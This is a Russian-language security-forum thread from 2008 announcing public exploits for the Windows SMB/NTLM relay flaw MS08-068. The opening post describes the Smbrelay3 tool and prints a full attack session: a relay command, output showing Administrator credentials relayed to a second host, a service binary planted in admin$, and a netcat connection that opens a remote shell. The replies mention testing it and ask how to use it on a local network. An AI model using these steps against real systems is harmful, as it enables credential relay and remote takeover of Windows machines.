ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
Опубликован полнофункциональный эксплоит к уязвимости MS08-068 |

18.11.2008, 11:51
|
|
Banned
Регистрация: 29.05.2008
Сообщений: 116
Провел на форуме: 447871
Репутация:
208
|
|
Опубликован полнофункциональный эксплоит к уязвимости MS08-068
В публичном доступе находится полнофункциональный эксплоит к уязвимости в реализации протокола SMB в Microsoft Windows. Проблема заключается в том, что NTLM позволяет пользователям отвечать на входящие подключения от других хостов и удачно аутентифицироваться на системе без знания пароля. Таким образом, если пользователь подключается к удаленной системе с помощью NTLM, существует возможность компрометации системы пользователя.
Эта аутентификационная схема используется в большом количестве протоколов, например HTTP. Также, существует функционал, позволяющий браузеру (iexplore) или системе (explorer) по умолчанию отправлять аутентификационные данные серверу, если сервер требует аутентификацию.
Smbrelay3 – утилита, которая позволяет злоумышленнику произвести следующие типы атак:
HTTP –> SMB – соединение с браузером и передача данных на SMB хост
SMB -> SMB – соединение с SMB системой и передача данных на другой хост
IMAP -> SMB – соединение с почтовым IMAP клиентом и передача данных на другой хост
POP3 -> SMB – соединение с почтовым POP3 клиентом и передача данных на другой хост
SMTP -> SMB – соединение с почтовым SMTP клиентом и передача данных на другой хост
Если полученные утилитой учетные данные принадлежат администратору системы, Smbrelay3 автоматически создает удаленную консоль на уязвимой системе.
Пример атаки:
C:\smbrelay3>smbrelay3.exe --ListForHTTPRequests --AlternativeHTTPPort 81
SmbRelay3 - SMB to SMB and HTTP to SMB replay attack
(c) 2007 - 2008 Andres Tarasco - atarasco@gmail.com
Website: http://www.tarasco.org
Listening HTTP thread at port 81
Accepted Connection - Replaying against 192.168.1.2
Read First HTTP Request...
Sending Default HTTP 401 Error response and asking for authentiation NTLM
Read Second HTTP Request with Auhorization Header..
Init HTTP to SMB attack - Connecting with: 192.168.1.2:445
Sending SMB Authentication Handshake
Received SMB Message with NTLM v2 packet
Sending NTLM Challenge from SMB Server to the HTTP Client
Received Final Authentication packet from remote HTTP Client
UserName: Administrator
DomainName: 192.168.1.36
WorkstationName: SERVIDOR
Trying to authenticate to remote SMB as Administrator
Sending Final SMB Authentication packet with NTLM Message type 3
SessionSetupAndX Completed
Authenticacion against 192.168.1.2 Succeed with username Administrator
Connecting against IPC$
Trying to connect to admin$
Creating Remote File smrs.exe under admin$
Writing File smrs.exe into admin$
Closing File handle - FID: 800f
Opening Remote Service Control Manager pipe \svcctl
Sending RPC BindRequest to SCM pipe
Reading Response from Binding Request
Opening Remote Service Control Manager
Creating Remote Service
Opening Remote Service
Starting Remote Service...
Now Remote Service is executed... Try to connect to 192.168.1.2:8080
C:\smbrelay3>nc 192.168.1.2 8080
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>
Smbrelay3 можно скачать по адресу:
хэк
В настоящий момент в публичном доступе находятся следующие эксплоиты к уязвимости MS08-068:
MS Windows SMBRelay MitM Attack Exploit (MS08-068)
Microsoft Windows SMB Relay Code Execution Exploit (MS08-068)
Microsoft Windows SMB Relay Code Execution Exploit #3 (MS08-068)
Для удачной эксплуатации уязвимости целевой пользователь должен подключиться к злонамеренному серверу.
|
|
|

18.11.2008, 12:47
|
|
Познавший АНТИЧАТ
Регистрация: 22.11.2007
Сообщений: 1,822
Провел на форуме: 4468361
Репутация:
1549
|
|
и, соответственно, - все антивири тоже восхитились данной уязвимостью и моментально добавили свои заплатки. В итоге, - толку нету.
Последний раз редактировалось Cthulchu; 18.11.2008 в 12:51..
|
|
|

19.11.2008, 00:13
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме: 6828219
Репутация:
2274
|
|
Ну да, MS04-011 дасихпор катит а это так ваще... Особено в сетях где антивирей нифига нету
|
|
|

19.11.2008, 02:27
|
|
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме: 3370466
Репутация:
96
|
|
скачал,ща тестю в своей сети 
MS04-011 прошол на ура 
|
|
|

19.11.2008, 19:19
|
|
Участник форума
Регистрация: 08.04.2008
Сообщений: 150
Провел на форуме: 3980762
Репутация:
136
|
|
Чет я не понял, где в строке C:\smbrelay3>smbrelay3.exe --ListForHTTPRequests --AlternativeHTTPPort 81 мы указываем что нужно ломится на 192.168.1.2 ? нипанятна. это я должен зайти на определенный сайт и запустить с этими параметрами? Вобщем подскажите как в локалке заюзать
|
|
|

19.11.2008, 20:00
|
|
Познавший АНТИЧАТ
Регистрация: 22.11.2007
Сообщений: 1,822
Провел на форуме: 4468361
Репутация:
1549
|
|
ван миллион долларз? нипанятна-а-а-а...
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|